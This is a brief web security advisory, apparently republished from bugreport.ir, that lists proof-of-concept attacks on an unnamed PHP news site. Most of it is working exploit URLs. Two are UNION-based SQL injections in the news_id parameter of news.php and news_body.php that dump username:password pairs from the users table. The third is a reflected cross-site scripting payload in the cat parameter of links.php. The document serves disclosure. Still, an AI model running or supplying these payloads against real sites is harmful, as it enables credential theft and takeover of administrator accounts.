# Original Advisory: www.bugreport.ir/?/50

1. Exploits/POCs:
    1.1. Injection Flaws. SQL Injection in "/news.php" or "/news_body.php" in "news_id" parameter.
        -------------
        Find Admin's password:
        http://[URL]/news.php?news_id=65 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12 from users/*
        http://[URL]/news_body.php?news_id=65 union select 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12 from users/*
        -------------
        1.2. Cross Site Scripting (XSS). Reflected XSS attack in "/links.php" in "cat" parameter.
        -------------
        http://[URL]/links.php?cat=<script>alert(/XSS/.source)</script>
        -------------